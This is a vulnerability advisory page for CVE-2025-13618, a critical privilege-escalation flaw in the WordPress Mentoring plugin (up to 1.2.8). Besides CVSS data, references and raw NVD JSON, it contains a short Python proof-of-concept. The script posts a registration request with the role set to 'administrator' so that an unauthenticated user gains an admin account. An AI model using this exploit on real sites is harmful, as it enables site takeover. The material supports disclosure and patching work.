CVE-2025-13618

Description

The Mentoring plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 1.2.8. This is due to the plugin not properly restricting the roles that users can register with in the mentoring_process_registration() function. This makes it possible for unauthenticated attackers to register with administrator-level user accounts.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

WordPress Mentoring Plugin <= 1.2.8

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests # Target configuration target_url = "http://example.com/wp-admin/admin-ajax.php" # Adjust endpoint based on actual plugin implementation # Payload data attempting to register as administrator payload = { "action": "mentoring_process_registration", # The vulnerable function hook "username": "evil_admin", "email": "[email protected]", "password": "P@ssw0rd123!", "role": "administrator" # Malicious parameter escalation } try: response = requests.post(target_url, data=payload) if response.status_code == 200: print("[+] Request sent. Check if user was created.") print(response.text) else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[!] An error occurred: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-13618
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-13618
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-13618/
[4] VulDB https://vuldb.com/cve/CVE-2025-13618
[5] https://mentoring-wp.dreamsmarketplace.com/documentation/changelog.html
[6] https://themeforest.net/item/mentoring-education-wordpress-theme/36457081
[7] https://www.wordfence.com/threat-intel/vulnerabilities/id/7192fb4c-0434-4e11-a2a7-c205b8d6b68e?source=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-13618", "sourceIdentifier": "[email protected]", "published": "2026-05-05T03:15:58.913", "lastModified": "2026-05-05T19:09:32.000", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Mentoring plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 1.2.8. This is due to the plugin not properly restricting the roles that users can register with in the mentoring_process_registration() function. This makes it possible for unauthenticated attackers to register with administrator-level user accounts."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-269"}]}], "references": [{"url": "https://mentoring-wp.dreamsmarketplace.com/documentation/changelog.html", "source": "[email protected]"}, {"url": "https://themeforest.net/item/mentoring-education-wordpress-theme/36457081", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/7192fb4c-0434-4e11-a2a7-c205b8d6b68e?source=cve", "source": "[email protected]"}]}}